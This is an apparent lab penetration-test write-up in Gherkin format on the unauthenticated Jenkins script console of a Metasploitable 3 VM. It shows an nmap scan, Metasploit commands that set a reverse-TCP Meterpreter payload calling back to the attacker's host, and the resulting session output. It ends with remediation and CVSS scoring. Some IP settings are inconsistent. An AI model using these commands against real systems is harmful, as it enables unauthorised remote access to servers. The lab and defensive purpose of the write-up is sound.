## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 3
  Location:
    172.28.128.3:8484 TCP
  CWE:
    CWE-0255: Credentials Management Errors:
      https://cwe.mitre.org/data/definitions/255.html
    CWE-0200: Exposure of Sensitive Information to an Unauthorized Actor:
      https://cwe.mitre.org/data/definitions/200.html
  Rule:
    REQ.142: https://fluidattacks.com/web/rules/142/
  Goal:
    Achieve a user session to the machine
  Recommendation:
    Modify default settings, only expose required services to public

  Background:
  Hacker's software:
    | <Software name>        | <Version>   |
    | Kali GNU/Linux Rolling | 2020.2a     |
    | Nmap                   | 7.80        |
    | Metasploit             | 5.0.87-dev  |
  TOE information:
    Given I am running a Metasploitable3 windows VM at
    """
    172.28.128.3
    """
  Scenario: Normal use case
    Given I am allowed to access the CI/CD
    When I enter the Credentials
    Then I am able to use Jenkins

  Scenario: Dynamic detection
    Given I scan the target machine
    When I scan open ports with
    """
    $ nmap -p0- 172.28.128.3
    """
    Then i get the following output:
    """
    Nmap scan report for 172.28.128.3
    Host is up (0.0024s latency).
    Not shown: 65517 filtered ports
    PORT      STATE SERVICE
    21/tcp    open  ftp
    22/tcp    open  ssh
    80/tcp    open  http
    1617/tcp  open  nimrod-agent
    4848/tcp  open  appserv-http
    5985/tcp  open  wsman
    8020/tcp  open  intu-ec-svcdisc
    8022/tcp  open  oa-system
    8027/tcp  open  unknown
    8080/tcp  open  http-proxy
    8282/tcp  open  libelle
    8383/tcp  open  m2mservices
    8484/tcp  open  unknown
    8585/tcp  open  unknown
    9200/tcp  open  wap-wsp
    49153/tcp open  unknown
    49154/tcp open  unknown
    49177/tcp open  unknown
    49178/tcp open  unknown
    """
    And I found that the default port for Jenkins is open
    """
    8484/tcp  open  unknown
    """
    Then I can conclude that Jenkins config is probably the default one
    And that it probably has security holes

  Scenario: Exploitation
    Given The machine with Jenkins open port
    When I use Metasploit, i found the following exploits for jenkins
    """
    exploit/multi/http/jenkins_metaprogramming
    exploit/multi/http/jenkins_script_console
    exploit/multi/http/jenkins_xstream_deserialize
    """
    Then I select the second one
    Given That exploit, I select it in Metasploit
    """
    msf5 > use exploit/multi/http/jenkins_script_console
    """
    Then I procede to check out the options needed to execute it, with
    """
    msf5 exploit(multi/http/jenkins_script_console) > show options
    Module options (exploit/multi/http/jenkins_script_console):

    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    API_TOKEN                   no        The API token for the specified...
    PASSWORD                    no        The password for the specified...
    Proxies                     no        A proxy chain of format type...
    RHOSTS                      yes       The target host(s), range CIDR...
    RPORT      80               yes       The target port (TCP)
    SRVHOST    0.0.0.0          yes       The local host to listen on...
    SRVPORT    8080             yes       The local port to listen on.
    SSL        false            no        Negotiate SSL/TLS for outgoing...
    SSLCert                     no        Path to a custom SSL certificate...
    TARGETURI  /jenkins/        yes       The path to the Jenkins-CI app...
    URIPATH                     no        The URI to use for this exploit...
    USERNAME                    no        The username to authenticate as
    VHOST                       no        HTTP server virtual host

    Exploit target:

    Id  Name
    --  ----
    0   Windows
    """
    And I Found that i have all the required options
    When I procede to introduce all the required options
    """
    msf5 exploit(multi/http/jenkins_script_console) > set RHOST 178.28.128.3
    RHOST => 178.28.128.3
    msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8484
    RPORT => 8484
    msf5 exploit(multi/http/jenkins_script_console) > set targeturi /
    targeturi => /
    msf5 exploit(multi/http/jenkins_script_console) > set SRVHOST 172.128.128.4
    SRVHOST => 172.128.128.4
    """
    Then I get no errors
    Given That the target is a windows system
    Then I procede to use the following payload
    """
    msf5 exploit(multi/http/jenkins_script_console) > set payload windows
    /meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/http/jenkins_script_console) > set LHOST 172.28.128.4
    LHOST => 172.28.128.4
    """
    And I procede to execute the exploit
    """
    msf5 exploit(multi/http/jenkins_script_console) > exploit

    [*] Started reverse TCP handler on 172.28.128.4:4444
    [*] Checking access to the script console
    [*] No authentication required, skipping login...
    [*] 172.28.128.3:8484 - Sending command stager...
    [*] Command Stager progress -   2.06% done (2048/99626 bytes)
    [*] Command Stager progress -   4.11% done (4096/99626 bytes)
    [*] Command Stager progress -   6.17% done (6144/99626 bytes)
    [*] Command Stager progress -   8.22% done (8192/99626 bytes)
    ...
    [*] Command Stager progress -  96.62% done (96256/99626 bytes)
    [*] Command Stager progress -  98.67% done (98304/99626 bytes)
    [*] Sending stage (176195 bytes) to 172.28.128.3
    [*] Command Stager progress - 100.00% done (99626/99626 bytes)
    [*] Meterpreter session 1 opened (172.28.128.4:4444 -> 172.28.128.3:49341)
    at 2020-07-09 15:09:05 -0400
    """
    Given That successful result
    When I check out if I am really in the system, I get the following output
    """
    meterpreter > pwd
    C:\Program Files\jenkins\Scripts
    meterpreter > ls
    Listing: C:\Program Files\jenkins\Scripts
    =========================================

    Mode              Size  Type  Last modified              Name
    ----              ----  ----  -------------              ----
    100666/rw-rw-rw-  130   fil   2016-10-21 19:06:19 -0400  jenkins.ps1

    meterpreter > cd ..
    meterpreter > ls
    Listing: C:\Program Files\jenkins
    =================================

    Mode              Size      Type  Last modified              Name
    ----              ----      ----  -------------              ----
    40777/rwxrwxrwx   0         dir   2020-05-13 10:43:20 -0400  Scripts
    100777/rwxrwxrwx  192000    fil   2020-05-13 10:43:15 -0400  jenkins.exe
    100666/rw-rw-rw-  63532267  fil   2020-05-13 10:43:13 -0400  jenkins.war

    meterpreter > cd C:\
    cd C:\$Recycle.Bin                 cd C:\System\ Volume\ Information
    cd C:\Boot                         cd C:\Users
    cd C:\Documents\ and\ Settings     cd C:\Windows
    cd C:\ManageEngine                 cd C:\glassfish
    cd C:\PerfLogs                     cd C:\inetpub
    cd C:\ProgramData                  cd C:\openjdk6
    cd C:\Program\ Files               cd C:\startup
    cd C:\Program\ Files\ (x86)        cd C:\tmp
    cd C:\Recovery                     cd C:\tools
    cd C:\RubyDevKit                   cd C:\wamp
    """
    Then I conclude that I am in the system

  Scenario: Remediation
    Given The default jenkins configuration
    When I access the jenkins server in the vm in
    """
    http://localhost:8484/
    """
    Then I go to the manage settings section
    And Into configure global security
    When I am in this section
    Then I tick the checkbox
    """
    Enable security
    """
    And In access control, I select the radiobutton
    """
    Jenkins’ own user database
    """
    Given Now the security is enabled
    When I create a user in
    """
    credentials -> global credentials section -> add credentials
    """
    Then I try to re-run my exploit
    And Found that it no longer works
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.2/10 (High) - CR:M/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-07-09
